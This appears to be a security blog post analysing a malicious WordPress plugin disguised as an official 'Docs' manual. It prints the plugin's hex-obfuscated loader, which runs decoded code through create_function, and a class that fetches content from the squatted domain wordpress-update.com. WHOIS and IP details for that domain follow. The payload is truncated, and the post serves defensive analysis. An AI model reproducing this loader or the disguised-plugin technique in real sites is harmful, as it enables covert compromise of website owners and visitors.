Fake wordpress-update.com site used to distribute malware via malicious plugins.

In recent days, we have worked on several infected WordPress websites that all had the particularity of having the same malicious plugin installed:

Hackers gained access to the admin dashboard, uploaded it and enabled it.
The plugin claims to be the WordPress online manual (!).

This is what the plugin code looks like:

<?php
/**
 *
 * @package     Docs
 * @version     1.1.0
 * @author      WordPress.com <wordpress.com>
 * @copyright   Copyright (c) 2012, WordPress.com
 * @license     http://opensource.org/licenses/gpl-2.0.php GPL v2 or later
 * @link        http://wordpress.com
 * @description Welcome, the online manual for WordPress and a living repository for WordPress information and documentation.
 */
/*
Plugin Name: Docs
Plugin URI: http://wordpress.com
Description: Welcome, the online manual for WordPress and a living repository for WordPress information and documentation.
Version: 1.1.0
Author: WordPress.com
Author URI: http://wordpress.com
License: GPLv2 or later
*/

$lLzmx = "6966282166756e6374696f6e5f6578...[TRUNCATED CODE].......657869743b0a09097d0a097d0a7d";
if(!function_exists("hex2asc")){
    function hex2asc($in){
        $out = "";
        $j=strlen($in)/2;
        for($i=0;$i<$j;$i++){
            $out.=chr(
                base_convert(substr($in,$i*2,2),16,10)
            );
        }
        return $out;
    }
}
$lLzmx = create_function(null, hex2asc($lLzmx));
$lLzmx();
?>

This is only a truncated version, you can see the full code in our Malware Threats Report #20151027#11 which includes the raw plugin, its de-obfuscated version and, in the third window, the code remotely downloaded by the plugin.

The plugin connects to a fake wordpress-update.com website:

class Docs_Plugin {
        private $_host;
        private $_server = "http://wordpress-update.com/";
        private $_uri = FALSE;
        private $_pluginPath;
        private $_cacheFolder;
        function __construct(){
...
...

It downloads a lot of data which is stored in the /wp-content/plugins/Docs/cache/ folder. All files have a MD5 hash name (based on the $_SERVER['REQUEST_URI'] environment variable) with a .dat extension and there could be thousands of them.

A quick look a the domain name shows that it was registrered with NameSilo LLC on 18-jun-2015:

$ whois wordpress-update.com

Whois Server Version 2.0

   Domain Name: WORDPRESS-UPDATE.COM
   Registrar: NAMESILO, LLC
   Sponsoring Registrar IANA ID: 1479
   Whois Server: whois.namesilo.com
   Referral URL: http://www.namesilo.com
   Name Server: NS1.ADMINVPS.RU
   Name Server: NS2.ADMINVPS.RU
   Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
   Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
   Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
   Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
   Updated Date: 24-jun-2015
   Creation Date: 18-jun-2015
   Expiration Date: 18-jun-2016

Its IP shows it is currently hosted by German hosting company Hetzner Online GmbH:

$ host -t a wordpress-update.com
wordpress-update.com has address 136.243.243.205

 

$ whois 136.243.243.205 | grep netname:
netname:        HETZNER-RZ-BLK-ERX3

 
This is neither the first nor the last case of domain squatting used for malicious purposes. For instance we noticed a wordpress-update.org (176.9.31.199) which, too, is hosted by Hetzner.